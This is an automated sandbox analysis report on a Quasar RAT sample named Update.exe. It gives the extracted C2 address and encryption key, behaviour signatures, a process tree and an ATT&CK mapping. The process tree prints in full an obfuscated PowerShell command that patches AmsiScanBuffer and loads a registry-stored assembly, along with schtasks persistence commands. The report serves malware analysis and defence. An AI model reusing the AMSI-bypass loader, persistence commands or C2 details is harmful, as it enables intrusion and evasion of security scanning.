Analysis

  • max time kernel
    150s
  • max time network
    149s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags

    arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
  • submitted
    21-04-2024 16:56

General

  • Target

    Update.exe

  • Size

    409KB

  • MD5

    ed68b64af85a06a4d3edfb0eedbd5a00

  • SHA1

    668dbc4990b0a1cdd2f0c254f41b539e9b69afc1

  • SHA256

    347776cb31b6dfbb5a5cbb39e617b3913b8af8a0a826468b7e0df3b4738fc184

  • SHA512

    7555b7ff4534f0549f35f14b47f8a75509801e4c87e3740aaae20cf6c291b1e17e8a4f833e05d73e2a39471e93a63b75d5513e999850a840ac58a38d656990be

  • SSDEEP

    6144:nrBdTMOznI2U/rgSuXfh+8sopVpkG9YiLLLKItKbFrJCBzzFd3MI:oynI2UeXfh+X+5YiPLKItwyRd3MI

Malware Config

Extracted

Family

quasar

Version

3.1.5

Botnet

SLAVE

C2

147.185.221.19:33587

Mutex

$Sxr-GdUyI5k46zQj7thBLl

Attributes
  • encryption_key

    y0X14czHxU2CjCZoALAD

  • install_name

    BiosUpdX64.exe

  • log_directory

    $sxr

  • reconnect_delay

    3000

  • startup_key

    $sxr-metsha

  • subdirectory

    Windows

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar payload 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Downloads MZ/PE file
  • Modifies Installed Components in the registry 2 TTPs 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 9 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 4 IoCs
  • Checks SCSI registry key(s) 3 TTPs 26 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Modifies data under HKEY_USERS 57 IoCs
  • Modifies registry class 16 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 45 IoCs
  • Suspicious use of FindShellTrayWindow 49 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:584
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
        • Suspicious use of FindShellTrayWindow
        PID:1004
      • C:\Windows\System32\dllhost.exe
        C:\Windows\System32\dllhost.exe /Processid:{c4825f8a-cddd-4e55-8809-643ba0d3e78f}
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4184
      • C:\Windows\explorer.exe
        explorer.exe
        2⤵
        • Modifies Installed Components in the registry
        • Enumerates connected drives
        • Drops file in Windows directory
        • Checks SCSI registry key(s)
        • Modifies registry class
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        PID:4484
    • C:\Windows\system32\lsass.exe
      C:\Windows\system32\lsass.exe
      1⤵
        PID:636
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay
        1⤵
          PID:728
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k dcomlaunch -s LSM
          1⤵
            PID:908
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
            1⤵
              PID:64
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
              1⤵
                PID:304
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts
                1⤵
                  PID:380
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog
                  1⤵
                    PID:1040
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                    1⤵
                      PID:1080
                      • c:\windows\system32\taskhostw.exe
                        taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                        2⤵
                          PID:2904
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:rbyPMSWWDIYz{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$mqJpnjjIwXKtAf,[Parameter(Position=1)][Type]$ReVZDpTDnf)$PzVqUndelcQ=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('Re'+[Char](102)+''+[Char](108)+''+[Char](101)+'c'+[Char](116)+''+[Char](101)+'d'+[Char](68)+''+[Char](101)+'l'+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+''+[Char](77)+''+'e'+''+'m'+''+'o'+''+[Char](114)+''+[Char](121)+''+[Char](77)+'o'+'d'+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+'y'+'D'+[Char](101)+''+[Char](108)+''+'e'+''+[Char](103)+''+[Char](97)+'t'+[Char](101)+''+'T'+'y'+[Char](112)+''+'e'+'',''+'C'+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+''+','+''+'P'+''+[Char](117)+''+[Char](98)+''+'l'+'i'+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](101)+''+'a'+''+'l'+''+'e'+'d,'+'A'+''+[Char](110)+'s'+'i'+''+[Char](67)+'l'+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](65)+''+[Char](117)+''+'t'+''+[Char](111)+''+[Char](67)+''+[Char](108)+''+[Char](97)+'s'+[Char](115)+'',[MulticastDelegate]);$PzVqUndelcQ.DefineConstructor('R'+'T'+''+[Char](83)+''+[Char](112)+''+[Char](101)+''+'c'+''+[Char](105)+''+'a'+'lN'+'a'+''+'m'+'e'+[Char](44)+'H'+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+'y'+''+'S'+'i'+[Char](103)+''+[Char](44)+''+[Char](80)+'u'+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$mqJpnjjIwXKtAf).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+[Char](116)+''+'i'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+'a'+[Char](110)+''+[Char](97)+'g'+'e'+''+'d'+'');$PzVqUndelcQ.DefineMethod('I'+[Char](110)+''+[Char](118)+''+[Char](111)+''+'k'+''+[Char](101)+'',''+'P'+'ub'+[Char](108)+''+[Char](105)+''+'c'+''+','+'Hi'+[Char](100)+'eBy'+[Char](83)+''+[Char](105)+'g'+[Char](44)+''+'N'+''+[Char](101)+''+[Char](119)+''+'S'+''+'l'+''+[Char](111)+''+[Char](116)+''+','+''+[Char](86)+''+'i'+''+'r'+''+'t'+'ual',$ReVZDpTDnf,$mqJpnjjIwXKtAf).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'nt'+'i'+''+[Char](109)+''+'e'+','+'M'+'an'+'a'+'ge'+'d'+'');Write-Output $PzVqUndelcQ.CreateType();}$qjTqAYujRxgjR=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('Sy'+[Char](115)+'t'+[Char](101)+''+[Char](109)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType(''+'M'+''+[Char](105)+''+'c'+''+[Char](114)+'o'+[Char](115)+'o'+'f'+''+[Char](116)+''+[Char](46)+'W'+[Char](105)+''+[Char](110)+''+[Char](51)+'2'+'.'+'U'+[Char](110)+''+[Char](115)+''+[Char](97)+''+'f'+''+'e'+''+[Char](78)+''+'a'+''+[Char](116)+''+[Char](105)+'v'+'e'+'M'+[Char](101)+''+'t'+''+'h'+'o'+[Char](100)+''+'s'+'');$CJLPhZTmIbjzLx=$qjTqAYujRxgjR.GetMethod(''+[Char](71)+'e'+[Char](116)+''+[Char](80)+''+'r'+''+[Char](111)+''+[Char](99)+''+[Char](65)+''+[Char](100)+''+'d'+''+[Char](114)+'ess',[Reflection.BindingFlags](''+'P'+'u'+'b'+''+[Char](108)+''+'i'+'c,St'+'a'+''+[Char](116)+''+[Char](105)+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$WOubvlbaoyDLNBMGOEB=rbyPMSWWDIYz @([String])([IntPtr]);$eMineYwiamzfsVmmqfvimZ=rbyPMSWWDIYz @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$BQTFqxkcBbb=$qjTqAYujRxgjR.GetMethod(''+[Char](71)+'e'+[Char](116)+''+[Char](77)+'o'+[Char](100)+''+'u'+''+[Char](108)+''+[Char](101)+''+[Char](72)+''+[Char](97)+''+[Char](110)+''+[Char](100)+''+'l'+''+'e'+'').Invoke($Null,@([Object](''+[Char](107)+'er'+[Char](110)+'e'+[Char](108)+''+[Char](51)+''+'2'+''+[Char](46)+''+[Char](100)+''+'l'+'l')));$IbdxMrWcCMgfQM=$CJLPhZTmIbjzLx.Invoke($Null,@([Object]$BQTFqxkcBbb,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+'dL'+[Char](105)+''+'b'+'ra'+[Char](114)+'y'+'A'+'')));$zBsXyuCcLGUTMdeQZ=$CJLPhZTmIbjzLx.Invoke($Null,@([Object]$BQTFqxkcBbb,[Object](''+'V'+''+[Char](105)+''+'r'+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+''+'P'+''+[Char](114)+''+[Char](111)+''+[Char](116)+''+[Char](101)+'c'+'t'+'')));$AjgUtzZ=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($IbdxMrWcCMgfQM,$WOubvlbaoyDLNBMGOEB).Invoke(''+'a'+'m'+[Char](115)+''+[Char](105)+''+'.'+''+'d'+''+'l'+''+'l'+'');$SpfalLkETqXGVwIEc=$CJLPhZTmIbjzLx.Invoke($Null,@([Object]$AjgUtzZ,[Object](''+[Char](65)+''+[Char](109)+''+'s'+''+[Char](105)+''+'S'+''+'c'+''+[Char](97)+''+'n'+''+[Char](66)+'u'+'f'+''+[Char](102)+''+[Char](101)+''+[Char](114)+'')));$phomDeRzDu=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($zBsXyuCcLGUTMdeQZ,$eMineYwiamzfsVmmqfvimZ).Invoke($SpfalLkETqXGVwIEc,[uint32]8,4,[ref]$phomDeRzDu);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$SpfalLkETqXGVwIEc,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($zBsXyuCcLGUTMdeQZ,$eMineYwiamzfsVmmqfvimZ).Invoke($SpfalLkETqXGVwIEc,[uint32]8,0x20,[ref]$phomDeRzDu);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+'F'+'T'+'W'+[Char](65)+''+'R'+'E').GetValue('$'+'7'+''+[Char](55)+''+'s'+'t'+'a'+''+[Char](103)+''+'e'+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"
                          2⤵
                          • Suspicious use of NtCreateUserProcessOtherParentProcess
                          • Drops file in System32 directory
                          • Suspicious use of SetThreadContext
                          • Modifies data under HKEY_USERS
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of WriteProcessMemory
                          PID:3520
                      • c:\windows\system32\svchost.exe
                        c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService
                        1⤵
                          PID:1100
                        • c:\windows\system32\svchost.exe
                          c:\windows\system32\svchost.exe -k localservice -s nsi
                          1⤵
                            PID:1172
                          • c:\windows\system32\svchost.exe
                            c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                            1⤵
                              PID:1220
                            • c:\windows\system32\svchost.exe
                              c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp
                              1⤵
                                PID:1304
                              • c:\windows\system32\svchost.exe
                                c:\windows\system32\svchost.exe -k netsvcs -s Themes
                                1⤵
                                  PID:1324
                                • c:\windows\system32\svchost.exe
                                  c:\windows\system32\svchost.exe -k localservice -s EventSystem
                                  1⤵
                                    PID:1336
                                  • c:\windows\system32\svchost.exe
                                    c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                                    1⤵
                                      PID:1416
                                      • c:\windows\system32\sihost.exe
                                        sihost.exe
                                        2⤵
                                        • Modifies registry class
                                        PID:2588
                                    • c:\windows\system32\svchost.exe
                                      c:\windows\system32\svchost.exe -k netsvcs -s SENS
                                      1⤵
                                        PID:1472
                                      • c:\windows\system32\svchost.exe
                                        c:\windows\system32\svchost.exe -k networkservice -s NlaSvc
                                        1⤵
                                          PID:1540
                                        • c:\windows\system32\svchost.exe
                                          c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder
                                          1⤵
                                            PID:1564
                                          • c:\windows\system32\svchost.exe
                                            c:\windows\system32\svchost.exe -k networkservice -s Dnscache
                                            1⤵
                                              PID:1584
                                            • c:\windows\system32\svchost.exe
                                              c:\windows\system32\svchost.exe -k localservice -s netprofm
                                              1⤵
                                                PID:1664
                                              • C:\Windows\System32\svchost.exe
                                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
                                                1⤵
                                                  PID:1680
                                                • C:\Windows\System32\svchost.exe
                                                  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
                                                  1⤵
                                                    PID:1796
                                                  • C:\Windows\system32\svchost.exe
                                                    C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted
                                                    1⤵
                                                      PID:1804
                                                    • c:\windows\system32\svchost.exe
                                                      c:\windows\system32\svchost.exe -k appmodel -s StateRepository
                                                      1⤵
                                                        PID:1868
                                                      • c:\windows\system32\svchost.exe
                                                        c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                                                        1⤵
                                                          PID:1904
                                                        • C:\Windows\System32\spoolsv.exe
                                                          C:\Windows\System32\spoolsv.exe
                                                          1⤵
                                                            PID:1536
                                                          • c:\windows\system32\svchost.exe
                                                            c:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation
                                                            1⤵
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:1900
                                                          • c:\windows\system32\svchost.exe
                                                            c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
                                                            1⤵
                                                              PID:2060
                                                            • c:\windows\system32\svchost.exe
                                                              c:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc
                                                              1⤵
                                                                PID:2364
                                                              • c:\windows\system32\svchost.exe
                                                                c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
                                                                1⤵
                                                                • Enumerates connected drives
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:2492
                                                              • c:\windows\system32\svchost.exe
                                                                c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
                                                                1⤵
                                                                  PID:2536
                                                                • c:\windows\system32\svchost.exe
                                                                  c:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent
                                                                  1⤵
                                                                    PID:2544
                                                                  • c:\windows\system32\svchost.exe
                                                                    c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc
                                                                    1⤵
                                                                      PID:2632
                                                                    • c:\windows\system32\svchost.exe
                                                                      c:\windows\system32\svchost.exe -k netsvcs -s Browser
                                                                      1⤵
                                                                        PID:2708
                                                                      • C:\Windows\sysmon.exe
                                                                        C:\Windows\sysmon.exe
                                                                        1⤵
                                                                          PID:2716
                                                                        • c:\windows\system32\svchost.exe
                                                                          c:\windows\system32\svchost.exe -k networkservice -s CryptSvc
                                                                          1⤵
                                                                            PID:2756
                                                                          • c:\windows\system32\svchost.exe
                                                                            c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks
                                                                            1⤵
                                                                              PID:2780
                                                                            • c:\windows\system32\svchost.exe
                                                                              c:\windows\system32\svchost.exe -k netsvcs -s WpnService
                                                                              1⤵
                                                                                PID:2792
                                                                              • c:\windows\system32\svchost.exe
                                                                                c:\windows\system32\svchost.exe -k netsvcs -s TokenBroker
                                                                                1⤵
                                                                                  PID:3052
                                                                                • C:\Windows\system32\wbem\unsecapp.exe
                                                                                  C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                                  1⤵
                                                                                    PID:2864
                                                                                  • C:\Windows\Explorer.EXE
                                                                                    C:\Windows\Explorer.EXE
                                                                                    1⤵
                                                                                      PID:3360
                                                                                      • C:\Users\Admin\AppData\Local\Temp\Update.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\Update.exe"
                                                                                        2⤵
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        • Suspicious use of WriteProcessMemory
                                                                                        PID:4924
                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                          "schtasks" /create /tn "$sxr-metsha" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Update.exe" /rl HIGHEST /f
                                                                                          3⤵
                                                                                          • Creates scheduled task(s)
                                                                                          PID:4592
                                                                                        • C:\Users\Admin\AppData\Roaming\Windows\BiosUpdX64.exe
                                                                                          "C:\Users\Admin\AppData\Roaming\Windows\BiosUpdX64.exe"
                                                                                          3⤵
                                                                                          • Executes dropped EXE
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                          • Suspicious use of WriteProcessMemory
                                                                                          PID:508
                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                            "schtasks" /create /tn "$sxr-metsha" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Windows\BiosUpdX64.exe" /rl HIGHEST /f
                                                                                            4⤵
                                                                                            • Creates scheduled task(s)
                                                                                            PID:4356
                                                                                        • C:\Users\Admin\AppData\Local\Temp\Install.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\Install.exe"
                                                                                          3⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:4972
                                                                                        • C:\Windows\SysWOW64\SCHTASKS.exe
                                                                                          "SCHTASKS.exe" /create /tn "$77Update.exe" /tr "'C:\Users\Admin\AppData\Local\Temp\Update.exe'" /sc onlogon /rl HIGHEST
                                                                                          3⤵
                                                                                          • Creates scheduled task(s)
                                                                                          PID:4440
                                                                                      • C:\Windows\system32\WerFault.exe
                                                                                        C:\Windows\system32\WerFault.exe -u -p 3360 -s 7180
                                                                                        2⤵
                                                                                          PID:2920
                                                                                      • C:\Windows\System32\RuntimeBroker.exe
                                                                                        C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                        1⤵
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        PID:3932
                                                                                      • C:\Windows\system32\DllHost.exe
                                                                                        C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                        1⤵
                                                                                          PID:3684
                                                                                          • C:\Windows\system32\WerFault.exe
                                                                                            C:\Windows\system32\WerFault.exe -u -p 3684 -s 964
                                                                                            2⤵
                                                                                              PID:880
                                                                                          • c:\windows\system32\svchost.exe
                                                                                            c:\windows\system32\svchost.exe -k localservice -s CDPSvc
                                                                                            1⤵
                                                                                              PID:4752
                                                                                            • c:\windows\system32\svchost.exe
                                                                                              c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV
                                                                                              1⤵
                                                                                                PID:4488
                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                C:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc
                                                                                                1⤵
                                                                                                • Modifies data under HKEY_USERS
                                                                                                PID:3968
                                                                                              • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                1⤵
                                                                                                • Drops file in System32 directory
                                                                                                • Modifies data under HKEY_USERS
                                                                                                PID:2560
                                                                                              • c:\windows\system32\svchost.exe
                                                                                                c:\windows\system32\svchost.exe -k netsvcs -s wlidsvc
                                                                                                1⤵
                                                                                                  PID:4336
                                                                                                • C:\Windows\system32\DllHost.exe
                                                                                                  C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                  1⤵
                                                                                                    PID:3464
                                                                                                  • C:\Windows\system32\ApplicationFrameHost.exe
                                                                                                    C:\Windows\system32\ApplicationFrameHost.exe -Embedding
                                                                                                    1⤵
                                                                                                      PID:3948
                                                                                                    • C:\Windows\System32\InstallAgent.exe
                                                                                                      C:\Windows\System32\InstallAgent.exe -Embedding
                                                                                                      1⤵
                                                                                                        PID:3704
                                                                                                      • C:\Windows\system32\DllHost.exe
                                                                                                        C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
                                                                                                        1⤵
                                                                                                          PID:3068
                                                                                                          • C:\Windows\system32\WerFault.exe
                                                                                                            C:\Windows\system32\WerFault.exe -u -p 3068 -s 876
                                                                                                            2⤵
                                                                                                              PID:2284
                                                                                                          • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                            C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                            1⤵
                                                                                                              PID:4884
                                                                                                            • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                              C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                              1⤵
                                                                                                                PID:1960
                                                                                                              • C:\Windows\System32\svchost.exe
                                                                                                                C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                1⤵
                                                                                                                • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                PID:2272
                                                                                                              • C:\Windows\system32\DllHost.exe
                                                                                                                C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                                                                                                1⤵
                                                                                                                  PID:780
                                                                                                                • C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                                                                  "C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca
                                                                                                                  1⤵
                                                                                                                  • Drops file in Windows directory
                                                                                                                  • Enumerates system info in registry
                                                                                                                  • Modifies Internet Explorer settings
                                                                                                                  • Modifies registry class
                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                  PID:1388
                                                                                                                • C:\Windows\System32\mobsync.exe
                                                                                                                  C:\Windows\System32\mobsync.exe -Embedding
                                                                                                                  1⤵
                                                                                                                    PID:3876
                                                                                                                  • C:\Windows\system32\DllHost.exe
                                                                                                                    C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                    1⤵
                                                                                                                    • Drops file in System32 directory
                                                                                                                    • Drops file in Windows directory
                                                                                                                    PID:4608
                                                                                                                    • C:\Windows\system32\WerFault.exe
                                                                                                                      C:\Windows\system32\WerFault.exe -u -p 4608 -s 692
                                                                                                                      2⤵
                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                      PID:3912

                                                                                                                  Network

                                                                                                                  MITRE ATT&CK Matrix ATT&CK v13

                                                                                                                  Execution

                                                                                                                  Scheduled Task/Job

                                                                                                                  1
                                                                                                                  T1053

                                                                                                                  Persistence

                                                                                                                  Boot or Logon Autostart Execution

                                                                                                                  1
                                                                                                                  T1547

                                                                                                                  Registry Run Keys / Startup Folder

                                                                                                                  1
                                                                                                                  T1547.001

                                                                                                                  Scheduled Task/Job

                                                                                                                  1
                                                                                                                  T1053

                                                                                                                  Privilege Escalation

                                                                                                                  Boot or Logon Autostart Execution

                                                                                                                  1
                                                                                                                  T1547

                                                                                                                  Registry Run Keys / Startup Folder

                                                                                                                  1
                                                                                                                  T1547.001

                                                                                                                  Scheduled Task/Job

                                                                                                                  1
                                                                                                                  T1053

                                                                                                                  Defense Evasion

                                                                                                                  Modify Registry

                                                                                                                  2
                                                                                                                  T1112

                                                                                                                  Discovery

                                                                                                                  Query Registry

                                                                                                                  3
                                                                                                                  T1012

                                                                                                                  Peripheral Device Discovery

                                                                                                                  2
                                                                                                                  T1120

                                                                                                                  System Information Discovery

                                                                                                                  3
                                                                                                                  T1082

                                                                                                                  Command and Control

                                                                                                                  Web Service

                                                                                                                  1
                                                                                                                  T1102

                                                                                                                  Replay Monitor

                                                                                                                  Loading Replay Monitor...

                                                                                                                  Downloads

                                                                                                                  • C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Explorer.EXE_fde4955918ebc1ad4a2bc41b3fc25f6240ea1c_41822faa_cab_0530cfce\WERCF82.tmp.appcompat.txt
                                                                                                                    Filesize

                                                                                                                    6KB

                                                                                                                    MD5

                                                                                                                    f46275f9c0b7d57378a712b3b5213b0c

                                                                                                                    SHA1

                                                                                                                    deabdaf020ce95f5f0edec43711719873975b44a

                                                                                                                    SHA256

                                                                                                                    523bbacd7e59ce4231693d2e486f2c2f551265328c7c8f2b178d3c5a7d2a20ae

                                                                                                                    SHA512

                                                                                                                    9747d174735fcbbfa8e1957f9b0760db7ffeb563b27e565db4fe54ad74bb83409b3ba5adce5a022fbe0a5b7d17b8ddc9eed231117fd6316e675082e354e7cf54

                                                                                                                  • C:\ProgramData\Microsoft\Windows\WER\Temp\WER9CEA.tmp.csv
                                                                                                                    Filesize

                                                                                                                    33KB

                                                                                                                    MD5

                                                                                                                    9c75db299b853495eabdcd3ce5e3756b

                                                                                                                    SHA1

                                                                                                                    10589fbd1a4d609eae70c7c5071219160abb31a4

                                                                                                                    SHA256

                                                                                                                    a3b40d44b060765e51dab197a77686f17cf7b725f2a913d9181e0e08704cfa63

                                                                                                                    SHA512

                                                                                                                    dce6ee84c7c453b7b7e9767030ad879823e5faf7b520d8b7bd089535ac5231d586de4c2744b40e7da5c66cce23daedd53c6be6dd5f8c762d339242ad5563c08c

                                                                                                                  • C:\ProgramData\Microsoft\Windows\WER\Temp\WER9D1A.tmp.txt
                                                                                                                    Filesize

                                                                                                                    12KB

                                                                                                                    MD5

                                                                                                                    e7b17f2eb546d8a4f8f01c7bf5234235

                                                                                                                    SHA1

                                                                                                                    8995be08dc757b5069bbfd6e65219dfa43f054f7

                                                                                                                    SHA256

                                                                                                                    cc1081b88a43c8b0f600826902dd6fd397e1f912f1e2601374311be8b3c4eeaa

                                                                                                                    SHA512

                                                                                                                    32bbd9c487d066bc0b67f71db4fd1fbf2556e1cfc6fdfa9d86ffd21697f7d127aeac6e605da9fdc6d53cd9a0deeaf314e0d35c22df8b8a05dcc5b55cf2e49721

                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Install.exe
                                                                                                                    Filesize

                                                                                                                    162KB

                                                                                                                    MD5

                                                                                                                    152e3f07bbaf88fb8b097ba05a60df6e

                                                                                                                    SHA1

                                                                                                                    c4638921bb140e7b6a722d7c4d88afa7ed4e55c8

                                                                                                                    SHA256

                                                                                                                    a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc

                                                                                                                    SHA512

                                                                                                                    2fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4

                                                                                                                  • C:\Users\Admin\AppData\Roaming\Windows\BiosUpdX64.exe
                                                                                                                    Filesize

                                                                                                                    409KB

                                                                                                                    MD5

                                                                                                                    ed68b64af85a06a4d3edfb0eedbd5a00

                                                                                                                    SHA1

                                                                                                                    668dbc4990b0a1cdd2f0c254f41b539e9b69afc1

                                                                                                                    SHA256

                                                                                                                    347776cb31b6dfbb5a5cbb39e617b3913b8af8a0a826468b7e0df3b4738fc184

                                                                                                                    SHA512

                                                                                                                    7555b7ff4534f0549f35f14b47f8a75509801e4c87e3740aaae20cf6c291b1e17e8a4f833e05d73e2a39471e93a63b75d5513e999850a840ac58a38d656990be

                                                                                                                  • C:\Windows\Temp\__PSScriptPolicyTest_44diafa0.frs.ps1
                                                                                                                    Filesize

                                                                                                                    1B

                                                                                                                    MD5

                                                                                                                    c4ca4238a0b923820dcc509a6f75849b

                                                                                                                    SHA1

                                                                                                                    356a192b7913b04c54574d18c28d46e6395428ab

                                                                                                                    SHA256

                                                                                                                    6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

                                                                                                                    SHA512

                                                                                                                    4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

                                                                                                                  • memory/64-117-0x0000028E45CC0000-0x0000028E45CEB000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    172KB

